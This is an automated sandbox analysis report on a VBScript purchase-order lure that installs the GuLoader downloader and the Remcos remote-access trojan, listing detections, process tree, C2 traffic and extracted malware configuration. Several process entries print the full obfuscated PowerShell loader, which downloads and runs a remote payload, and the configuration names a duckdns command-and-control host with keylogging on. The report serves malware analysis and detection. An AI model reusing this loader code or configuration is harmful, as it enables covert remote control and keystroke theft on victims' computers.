Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
nOrden_de_Compra___0001245.vbs

Overview

General Information

Sample name:nOrden_de_Compra___0001245.vbs
Analysis ID:1545815
MD5:44f5fc0dbe40738a8d1da8a520c37ade
SHA1:1ae7e777e876136b30aec574f10215ef672ff451
SHA256:4c9a883ec5718156811bee47cca44c3115f1dcb04ecc6541192e807ec1952e85
Tags:vbsuser-Porcupine
Infos:

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Sigma detected: Remcos
Suricata IDS alerts for network traffic
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Found suspicious powershell code related to unpacking or dynamic code loading
Installs a global keyboard hook
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara signature match

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6416 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WMIC.exe (PID: 5264 cmdline: wmic diskdrive get caption,serialnumber MD5: C37F2F4F4B3CD128BDABCAEB2266A785)
      • conhost.exe (PID: 1396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 576 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 3200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 7108 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua Rn od EAlnovsS =G ( .tOvEG.S oTWr- PPrua ftT H U po$,eG LA mTiID.NNegMaSBi) U ') ;Germiniparous (Levelheadedness 'Fo$SnG LunoChBAsA QlI : oPSka,rs OTO.e.tl BfBoA R evMyeWaRP nS.eNes.t=U $ Ig Hl Uo.nbPeaWiLAl:Mep ArskoAfPEsh TytrL vAF cIntLoOFodLooyaNA TKoi.iaVe+Ev+ A%Su$AfFDiOS LPiIAroK ljgO ssF ERa1Fl9 T7Li.CacAmoc.uBln LTF, ') ;$Booklores=$Foliolose197[$Pastelfarvernes];}$Kontorassistentens153=302470;$Fejldisponeres=27572;Germiniparous (Levelheadedness 'De$ GSal TOSpB VaMalF :NoSMat DOLaKCoEAgs .I a S y=Mi GagR.EB T S-Dic noH nAuT wE ONTet . Un$ThgJeA SmShI HNS g LsFr ');Germiniparous (Levelheadedness '.e$Kmg .l to,ebDiaJalCa:N SSaeVrnMygS eH,n ,eDe B =ka Cl[ yS LyUdsNot.oe ,m .a CWeo PnRavUneKrrBltMa]Ex: U:ViFP r MoFom BKoaUvs ueAs6Ty4 ,SCatinrViiV.nR gFe(Al$ DsRet eo kAme asAriBla a)Be ');Germiniparous (Levelheadedness 'S $ BgRelGiO bDiaAnlAv:U.S TPA kPlK,eE SD.oe P Ma=Sl U[ SSnyUnsReTKoeSkmGl.MatPreN xb TPo. yEAunFeCGiOH,D siFln RGZa] .:O :UnAKaSRecpoiKoIEr.TaGPue .t bSintH rUnIQuN ogSt( $ SReEBrNDigO ePrnUnECe)H ');Germiniparous (Levelheadedness ' B$ aGStLUnO oBHeaMaLRe: AMChuFolReT Fi,ob.ei mrnot .HSu= T$NosRepOnk uK MeSvdDeeQu. AsS Um,bTusSaT TrTeINaNTrG (Re$.okS oH NA tE oGir HanoSDrsCai nS AT SE rNO tJaeFonP SUn1Ek5,a3 ,,Su$SuFAmE jWalS dL,IMasSapTroSmnMaeNoRPiE lSPo)Di ');Germiniparous $Multibirth;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 2608 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 6764 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": ["fumecexpsales1international.duckdns.org:50396:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T15VJD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
          00000006.00000002.2420231333.0000000008AA0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
            00000006.00000002.2420398899.000000000BB20000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              Click to see the 7 entries

              Other

              SourceRuleDescriptionAuthorStrings
              amsi64_576.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
                amsi32_7108.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
                • 0xbd12:$b2: ::FromBase64String(
                • 0xadb8:$s1: -join
                • 0x4564:$s4: +=
                • 0x4626:$s4: +=
                • 0x884d:$s4: +=
                • 0xa96a:$s4: +=
                • 0xac54:$s4: +=
                • 0xad9a:$s4: +=
                • 0x1426e:$s4: +=
                • 0x142ee:$s4: +=
                • 0x143b4:$s4: +=
                • 0x14434:$s4: +=
                • 0x1460a:$s4: +=
                • 0x1468e:$s4: +=
                • 0xb5c0:$e4: Get-WmiObject
                • 0xb7af:$e4: Get-Process
                • 0xb807:$e4: Start-Process
                • 0x14f4a:$e4: Get-Process

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", ProcessId: 6416, ProcessName: wscript.exe
                Sigma detected: Msiexec Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 200.6.118.162, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6764, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49401
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\nOrden_de_Compra___0001245.vbs", ProcessId: 6416, ProcessName: wscript.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Garveris nontitle Fiberizes skippendes Tirl Sennet Longus #>;$Conformists='Jacobes241';<#Udstykkerne Microfossil Syrians Zostera Condoled floozies #>; function Levelheadedness($Antinomians){If ($host.DebuggerEnabled) {$Videoapparatets86++;}$kreturene=$Pedlars+$Antinomians.'Length'-$Videoapparatets86; for ( $Tekstilarbejderne=2;$Tekstilarbejderne -lt $kreturene;$Tekstilarbejderne+=3){$Blinddren=$Tekstilarbejderne;$Maalestoksfaktor+=$Antinomians[$Tekstilarbejderne];}$Maalestoksfaktor;}function Germiniparous($Brions){ & ($Artistiske) ($Brions);}$Plenches=Levelheadedness ' ,MAno.vz,nifal lMoaA,/pe ';$Ruched=Levelheadedness 'FrTHalG s 1 S2 ';$underkuede='B [maNS.eIlTIb. ESCae SR SvHnIovCNoEU,P mO QIStNAaTA,MSuaTen bADeG BE r p]In:Ef:P.sHeEFiCFru dR fiDetD y lP rS OUnT ,ODdcEdOBeL O=,n$ R.eU CpuHTseStdTi ';$Plenches+=Levelheadedness 'T 5 R. a0Fo Li(DiW ,i CnArd.loC,wTesDe ReN ,TAn Ro1Tr0 .A.0G,;N ,WPui SnD 6do4M ;Fu ,xP.6Sa4 L; . HrPovSp:su1 3M.1Sl.Su0Te) O FoGUdeGrcfokCioBr/Bu2co0 F1 V0 0 F1So0S 1 G InFNoiMar leTufDioOmx M/ U1 r3Ne1in.Ma0Ko ';$Olga=Levelheadedness 'A U oSVaeParS,- aaTagRuEOlN CtO, ';$Booklores=Levelheadedness 'S.hEftOvt CpHjsNu:Br/Fu/ArtCaoFor.or teJesM vKdmAnaMicWhk Se UnEnn,fa A.Elc olHo/ rbSkiP.nAl/frIYen itLaeEvrM,pSil De VaSp.SlsCynB.pU ';$Afstalinisering=Levelheadedness ',n>K ';$Artistiske=Levelheadedness 'pri eKox s ';$Tekstilarbejdernenjustices='Hvorind';$Dadlers='\Trkfugl.Chr';Germiniparous (Levelheadedness ' y$Mog BlFoO.ub CAO l,b:SeN sOOpnVarUaE AL a ATT IStoS nDyA UlLd= a$E.e nU.V :AaaFipTuPFadUna GTE,ASh+Un$Udd Ra,ed LInEDiRElsTu ');Germiniparous (Levelheadedness 'Fo$PrgD.LUnO cBEbaDilAl:VefSaoCaL ImooBiLfooBeSAnEE 1Sa9 7Re=Am$ PBGuo noBiKsel aOB rPle sDe. Ps UP ,L tICot R(Li$CoaWofErSA,TKvaAllW IP N ZIEpsIsEEnROviMinPrGin) K ');Germiniparous (Levelheadedness $underkuede);$Booklores=$Foliolose197[0];$Moniliaceous231=(Levelheadedness 'My$HuGPilUdoHjBCoaJuLL.:SyS dKAkySkTTal ceAuR Nn,de FSco=HunPuEBoWb.- o ,B XJFrEUrc .tNu viSstyAnSE t uEavmSt..knfiETutMe.HewP EGeB .Cfal I E GnPlt M ');Germiniparous ($Moniliaceous231);Germiniparous (Levelheadedness 'M.$G,STikH,yF tUdls,eRurApnVieAcs D.D,H e aa CdDaeSurbasFe[ B$ ,OthlR g OaGe] H=Ho$ NPA,l e n.lcEeh pe TsLa ');$Absolutive138=Levelheadedness 'B,$F.S Mk yy Ptcel lerir Bn.aeAusBa.A.DC.o.vw DnsjltioUnas dG.F.ei.il eS (ma$OvBA oVio.lkLnl obarSkeFasC,,Sa$LoGRea BmBeiTrnlsgB,sDi) l ';$Gamings=$nonrelational;Germiniparous (Levelheadedness ',l$t,GSplG o .bH A BL :DrNCroKar m,ra al jtAnIviLC sDiTK,AUpNSpd TeFoNTrS.a= n(AvtHeEInSunT S-Mup UaNaTPeh H Di$T,GU,aFaM PIarnKoGLgsTi)K ');while (!$Normaltilstandens) {Germiniparous (Levelheadedness ' e$C,gBild,o ,b,haBelWr: iKBlaBlmG m,re SrOtaP tIns.p=T $S tAzr BuKreI ') ;Germiniparous $Absolutive138;Germiniparous (Levelheadedness 'blSB TTaAOsRSet -LoSFoLlaE,mEHepB Ge4Om ');Germiniparous (Levelheadedness 'Fr$ .g MlS O uB,aA l : NTaoslr m uaVoL ,tReiBrLmas STSua

                Stealing of Sensitive Information

                barindex
                Sigma detected: Remcos
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 6764, TargetFilename: C:\ProgramData\remcos\logs.dat

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T04:01:51.767234+010020365941Malware Command and Control Activity Detected192.168.2.549544185.236.203.10150396TCP
                2024-10-31T04:02:54.472407+010020365941Malware Command and Control Activity Detected192.168.2.549428185.236.203.10150396TCP
                2024-10-31T04:03:04.014344+010020365941Malware Command and Control Activity Detected192.168.2.549474185.236.203.10150396TCP
                2024-10-31T04:03:13.513777+010020365941Malware Command and Control Activity Detected192.168.2.549522185.236.203.10150396TCP
                2024-10-31T04:03:23.019864+010020365941Malware Command and Control Activity Detected192.168.2.549538185.236.203.10150396TCP
                2024-10-31T04:03:32.520591+010020365941Malware Command and Control Activity Detected192.168.2.549540185.236.203.10150396TCP
                2024-10-31T04:03:42.021521+010020365941Malware Command and Control Activity Detected192.168.2.549541185.236.203.10150396TCP
                2024-10-31T04:03:51.521790+010020365941Malware Command and Control Activity Detected192.168.2.549542185.236.203.10150396TCP
                2024-10-31T04:04:02.145928+010020365941Malware Command and Control Activity Detected192.168.2.549543185.236.203.10150396TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-31T04:02:42.296020+010028032702Potentially Bad Traffic192.168.2.549401200.6.118.162443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Found malware configuration
                Source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["fumecexpsales1international.duckdns.org:50396:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-T15VJD", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                Yara detected Remcos RAT
                Source: Yara matchFile source: 00000009.00000002.3333353972.000000002316F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317523548.000000000075D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.3317708385.0000000000789000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: msiexec.exe PID: 6764, type: MEMORYSTR
                Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.1% probability
                Source: unknownHTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49705 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 200.6.118.162:443 -> 192.168.2.5:49401 version: TLS 1.2
                Source: Binary string: m.Core.pdb source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: indows\System.Core.pdbui source: powershell.exe, 00000006.00000002.2411838712.0000000007685000.00000004.00000020.00020000.00000000.sdmp

                Software Vulnerabilities

                barindex
                Suspicious execution chain found
                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49428 -> 185.236.203.101:50396
                Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.5:49474 -> 185.236.203.101:50396
